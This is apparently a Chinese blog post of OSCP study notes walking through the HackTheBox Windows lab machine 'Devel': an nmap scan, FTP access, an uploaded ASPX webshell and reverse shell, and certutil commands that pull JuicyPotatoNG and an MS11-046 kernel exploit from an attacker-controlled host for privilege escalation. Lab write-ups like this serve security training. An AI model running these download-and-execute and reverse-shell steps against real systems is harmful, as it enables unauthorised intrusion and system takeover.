OSCP备考_0x38_HackThBox靶机_Windows_Devel

Ethan医生7个月前靶场220

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.254.198 (扫描TCP)

image.png


使用ftp进行连接

ftp 10.129.254.198 21


http://10.129.254.198/webshell.aspx

image.png

上传webshell以后使用webshell进行反弹


由于直接使用都会端开 这边找到

https://github.com/borjmz/aspx-reverse-shell/blob/master/shell.aspx

进行反弹

image.png

开始进行提权

  • System : Win 7 x64 6.1.7600 N/A Build 7600

尝试下载提权土豆

certutil -urlcache -split -f "http://10.10.16.43:8000/EXE/JuicyPotatoNG.exe" JuicyPotatoNG.exe

然后执行提权

根據google的結果,發現有MS11–046的漏洞,並在github找到exploit可以拿來利用。

https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS11-046?source=post_page-----afe2d27ea037---------------------------------------

certutil -urlcache -split -f "http://10.10.16.43:8000/ms11-046.exe" ms11-046.exe

image.png

image.png


标签: OSCP

相关文章

OSCP备考_0x03_Vulnhub靶机_KIOPTRIX:LEVEL1.2(#3)

OSCP备考_0x03_Vulnhub靶机_KIOPTRIX:LEVEL1.2(#3)

名称说明靶机下载链接https://www.vulnhub.com/entry/kioptrix-level-12-3,24/攻击机(kali)ip:192.168.233.168靶机(CentOS)...

OSCP备考_0x06_HackThBox靶机_Linux_Sense

OSCP备考_0x06_HackThBox靶机_Linux_Sense

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.131.103 (扫描TCP)上面的信息提供了直接跳转到443端口nmap -sU --top-ports...

OSCP备考_0x56_HackThBox靶机_Windows_worker

OSCP备考_0x56_HackThBox靶机_Windows_worker

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.2.29 (扫描TCP)svn list svn://10.129.2.29svn lo...

OSCP备考_0x07_HackThBox靶机_Linux_​Solidstate

OSCP备考_0x07_HackThBox靶机_Linux_​Solidstate

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.57.118 (扫描TCP)nmap -sU --top-ports 100 10.129.57....

OSCP备考_0x33_HackThBox靶机_luanne

OSCP备考_0x33_HackThBox靶机_luanne

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.167.171 (扫描TCP)nmap -sU --top-ports 100 ...

OSCP备考_0x30_HackThBox靶机_Linux_Doctor

OSCP备考_0x30_HackThBox靶机_Linux_Doctor

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.7.227 (扫描TCP)nmap -sU --top-ports 100 10.129.7.22...

发表评论    

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。